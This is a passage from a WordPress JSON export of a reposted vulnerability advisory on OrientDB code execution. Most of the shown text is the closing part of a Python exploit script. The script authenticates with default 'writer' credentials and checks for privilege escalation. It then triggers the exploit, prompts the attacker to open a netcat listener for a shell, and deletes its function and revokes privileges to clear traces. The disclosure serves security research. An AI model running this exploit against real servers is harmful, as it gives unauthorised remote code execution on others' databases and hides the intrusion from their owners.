class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">func_name<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-117\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.status_code<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.text<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-119\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Open netcat at port 8081..&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-123\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Exploitation failed at last step, try running the script again.&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">status_code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-125\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-126\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print &#8220;[+] Deleting traces..&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-128\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-129\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">req<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">delete<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s:%s\/document\/%s\/%s&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">databases<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">func_id<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;writer&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-130\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;REVOKE&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;database.class.ouser&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;Cleaning Up..database.class.ouser&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-131\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;REVOKE&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;database.function&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;Cleaning Up..database.function&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">priv3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">run_queries<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;REVOKE&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;database.systemclusters&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;Cleaning Up..database.systemclusters&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-133\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.status_code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print req.text<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-136\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-137\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-138\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-140\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#port = sys.argv[1] if sys.argv[1] else 2480<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-141\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2480<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-143\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#print port<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-144\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2480<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-146\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">priv_escalation<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-149\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Target not vulnerable&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10dc863783322-150\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10dc863783322-151\"><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0223 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\" alt=\"Print Friendly\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3318\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/pf-button.gif\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 13 Jul 2017 06:49:26 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory reports a vulnerability in OrientDB which allows users of the product to cause it to execute code. OrientDB is a Distributed Graph Database engine with the flexibility of a Document Database all in one product. The first and best scalable, high-performance, operational NoSQL database. Credit An independent security researcher, Francis &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3318\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 OrientDB Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757],"class_list":["post-8338","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8338","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8338"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8338\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8338"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8338"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8338"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}